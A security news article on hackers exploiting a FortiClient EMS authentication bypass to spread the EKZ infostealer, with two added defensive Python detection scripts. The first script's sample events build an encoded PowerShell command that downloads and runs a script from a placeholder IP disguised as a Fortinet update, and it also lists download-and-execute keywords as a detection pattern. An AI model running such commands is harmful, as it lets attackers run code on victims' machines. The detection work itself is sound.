FortiClient EMS flaw exploited by hackers to deploy infostealers

▼ Summary
– Hackers exploit authentication bypass vulnerability CVE-2026-35616 in FortiClient EMS to deliver the EKZ infostealer.
– The attacker disguised malware as a Fortinet endpoint update and executed it through VPN scripting workflows managed by FortiClient.
– Fortinet released emergency hotfixes for versions 7.4.5 and 7.4.6 after confirming exploitation in early April.
– CISA ordered federal agencies to secure their instances, and The Shadowserver Foundation identified roughly 2,000 internet-exposed EMS instances.
– The malware targets browser data including credentials, credit card details, and cookies, and Arctic Wolf recommends monitoring for certificate-authentication anomalies and configuration changes.
Cybercriminals are actively exploiting an authentication bypass vulnerability tracked as CVE-2026-35616 in FortiClient Enterprise Management Server (EMS) to deploy a previously undocumented credential stealer named EKZ. The attack campaign disguises the malware as a legitimate Fortinet endpoint update and executes it through VPN scripting workflows managed by FortiClient.
The underlying flaw, classified as an improper access control issue, enables unauthenticated remote attackers to execute arbitrary code or commands by sending specially crafted requests. Fortinet acknowledged active exploitation in early April and issued emergency hotfixes for versions 7.4.5 and 7.4.6 of the product.
The Cybersecurity and Infrastructure Security Agency (CISA) responded swiftly by ordering federal agencies to secure their instances by the end of that week. At the time, the internet security watchdog The Shadowserver Foundation reported approximately 2,000 internet-exposed EMS instances.
Earlier this month, cybersecurity firm Arctic Wolf observed attacks leveraging the vulnerability to distribute the EKZ infostealer. Researchers detail that the intrusion begins by abusing endpoint APIs to perform administrative actions without any authentication. The attacker then modifies the EMS configuration and VPN policies, adding scripts that FortiClient runs on managed endpoints when the VPN connects.
Seconds after an endpoint establishes an IPsec tunnel to a FortiGate firewall, the legitimate fortitray.exe process launches the malicious batch scripts through Command Prompt (cmd.exe). Those scripts run a base64-encoded PowerShell payload that downloads and executes the malware, which is disguised as a Fortinet patch. The stolen data is then exfiltrated to an attacker-controlled VPS over HTTP.
Rather than relying on a generic malware lure, the payload is presented as a Fortinet endpoint update and launched through FortiClient-managed VPN scripting workflows, so the activity originates from a legitimate FortiClient process, according to Arctic Wolf's report. On affected endpoints, FortiClient components launch command scripts that invoke PowerShell, download the credential stealer, execute it silently, exfiltrate the harvested browser data, and then remove the local artifacts.
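The execution chain above (fortitray.exe launching cmd.exe, which runs an encoded PowerShell download-and-execute payload) is something an endpoint telemetry pipeline can flag directly. The following is an added example written for this page, not code from Arctic Wolf or Fortinet: it walks a set of constructed, Sysmon-shaped process-creation events (field names, PIDs, the batch file path, the URL and the payload name are all assumptions), decodes any -EncodedCommand argument, and reports script hosts whose ancestry includes FortiTray, raising severity when the decoded command contains download or execute verbs.

```python
import base64
import re

# Sample process-creation events constructed for this example, in a
# Sysmon-like shape. The field names, PIDs, batch file path, URL and
# payload name are all assumptions, not indicators from the report.
PLACEHOLDER_PS = (
    "IEX (New-Object Net.WebClient)"
    ".DownloadString('http://203.0.113.10/FortiClientUpdate.ps1')"
)
ENCODED = base64.b64encode(PLACEHOLDER_PS.encode("utf-16le")).decode("ascii")
BENIGN_ENCODED = base64.b64encode("Get-Date".encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 800, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 1200, "ppid": 800,
     "image": r"C:\Program Files\Fortinet\FortiClient\FortiTray.exe",
     "cmdline": "FortiTray.exe"},
    # The chain described in the article: FortiTray -> cmd.exe -> encoded PowerShell.
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\ProgramData\vpn_connected.bat"},
    {"pid": 1400, "ppid": 1300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    # Benign: FortiTray opening the FortiClient console.
    {"pid": 1500, "ppid": 1200,
     "image": r"C:\Program Files\Fortinet\FortiClient\FortiClient.exe",
     "cmdline": "FortiClient.exe"},
    # Benign: an encoded command with no FortiTray ancestor.
    {"pid": 1600, "ppid": 800,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + BENIGN_ENCODED},
]

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_EXEC_VERBS = ("downloadstring", "downloadfile", "invoke-webrequest",
                       "iwr ", "start-bitstransfer", "invoke-expression", "iex ")
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the common spellings.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c|n)?\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE text), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(events_by_pid, pid):
    """Image names from pid upward, e.g. ['powershell.exe', 'cmd.exe', 'fortitray.exe', ...]."""
    chain, seen = [], set()
    while pid in events_by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(events_by_pid[pid]["image"]))
        pid = events_by_pid[pid]["ppid"]
    return chain


def find_suspicious_chains(events):
    """Flag script hosts running under FortiTray; raise severity when the
    PowerShell command line decodes to a download-and-execute payload."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        chain = ancestry(by_pid, e["pid"])
        if "fortitray.exe" not in chain[1:]:
            continue
        decoded = decode_encoded_command(e["cmdline"])
        severity = "medium"  # script host spawned under FortiTray
        if decoded and any(v in decoded.lower() for v in DOWNLOAD_EXEC_VERBS):
            severity = "high"  # plus an encoded download-and-execute payload
        findings.append({"pid": e["pid"], "chain": chain,
                         "severity": severity, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f["severity"], f["pid"], " <- ".join(f["chain"]))
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

The medium-severity tier is deliberate: FortiClient legitimately runs administrator-defined VPN connect/disconnect scripts, so a cmd.exe under FortiTray is not proof of compromise on its own, but the combination with hidden, encoded PowerShell that fetches and runs remote content is the pattern described in the report and is worth an immediate look.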
The EKZ infostealer offers fairly standard information-stealing functionality. It targets Chromium-based browsers and Firefox, decrypting the browsers' protected password stores and writing the extracted data to text files. The malware collects credentials, credit card details, addresses, phone numbers, and cookies. Stolen session cookies can be replayed from an attacker's browser to take over an already-authenticated session, sidestepping both the password and the multi-factor authentication prompt.
Arctic Wolf notes that one indication of an exploitation attempt delivering the EKZ infostealer is the presence of the log line “Certificate not found in request header.” In lab tests, this error was followed seconds later by another entry: “Certificate user: fortinet-ca2 … successfully updated.”
The researchers recommend that defenders look for certificate-authentication anomalies and unexpected changes to Remote Access Profile configurations. Any suspicious administrative activity, such as new accounts, logins from unfamiliar origins like Tor exit nodes or VPS IP addresses, or actions that lead to configuration changes, should be treated as a red flag. Arctic Wolf's report provides extensive detection guidance that can help organizations detect these observed attacks.
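The two server-side indicators above (a "Certificate not found in request header" entry followed seconds later by a "Certificate user: ... successfully updated" entry, plus Remote Access Profile changes from an unexpected source) lend themselves to a small correlation check. The following is an added example for this page, not code from Arctic Wolf or Fortinet: the log excerpt is constructed, its timestamp and src= layout is assumed (a real EMS log will need its own line pattern), the middle of the second quoted message that the report elides is simply left out, and the trusted administrator network is a placeholder.

```python
import ipaddress
import re
from datetime import datetime

# Constructed EMS log excerpt. The "timestamp src=IP message" layout is an
# assumption for this example; the two quoted message texts are the indicators
# from the report, with the elided middle of the second message left out.
SAMPLE_LOG = """\
2026-04-14 09:12:01 src=198.51.100.23 Certificate not found in request header
2026-04-14 09:12:04 src=198.51.100.23 Certificate user: fortinet-ca2 successfully updated
2026-04-14 09:15:30 src=198.51.100.23 Remote Access Profile 'Corp-VPN' updated
2026-04-14 10:02:11 src=10.0.5.17 Certificate not found in request header
2026-04-14 10:45:00 src=10.0.5.17 Remote Access Profile 'Corp-VPN' updated
2026-04-14 11:40:00 src=10.0.5.17 Endpoint check-in completed
"""

LINE_RE = re.compile(r"^(\S+ \S+) src=(\S+) (.*)$")
NOT_FOUND = "Certificate not found in request header"
UPDATED_RE = re.compile(r"Certificate user: .*successfully updated")
# Placeholder: networks from which EMS administration is expected.
TRUSTED_ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/8")]


def parse(log_text):
    """Return (timestamp, source IP, message) tuples in time order."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            events.append((ts, m.group(2), m.group(3)))
    return sorted(events, key=lambda e: e[0])


def find_cert_sequences(log_text, window_seconds=30):
    """Pair each 'Certificate not found' entry with the next 'Certificate user
    ... successfully updated' entry from the same source inside the window."""
    events = parse(log_text)
    hits = []
    for i, (t0, src, msg) in enumerate(events):
        if NOT_FOUND not in msg:
            continue
        for t1, src1, msg1 in events[i + 1:]:
            delta = (t1 - t0).total_seconds()
            if delta > window_seconds:
                break  # events are sorted, nothing later can qualify
            if src1 == src and UPDATED_RE.search(msg1):
                hits.append({"src": src, "first": t0, "second": t1, "delta_s": delta})
                break
    return hits


def find_untrusted_profile_changes(log_text, trusted=TRUSTED_ADMIN_NETS):
    """Flag Remote Access Profile changes whose source is outside trusted admin networks."""
    out = []
    for ts, src, msg in parse(log_text):
        if "Remote Access Profile" not in msg:
            continue
        ip = ipaddress.ip_address(src)
        if not any(ip in net for net in trusted):
            out.append({"src": src, "time": ts, "msg": msg})
    return out


if __name__ == "__main__":
    for h in find_cert_sequences(SAMPLE_LOG):
        print(f"cert sequence from {h['src']}: {h['delta_s']:.0f}s apart")
    for c in find_untrusted_profile_changes(SAMPLE_LOG):
        print(f"profile change from untrusted {c['src']} at {c['time']}: {c['msg']}")
```

A lone "Certificate not found" entry (the 10.0.5.17 line in the sample) is not reported, since the report ties the indicator to the follow-up "successfully updated" entry appearing seconds later; widen `window_seconds` if your EMS clock resolution or load makes the gap larger, and feed the flagged source IPs into the Tor/VPS origin checks the researchers recommend.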
(Source: BleepingComputer)


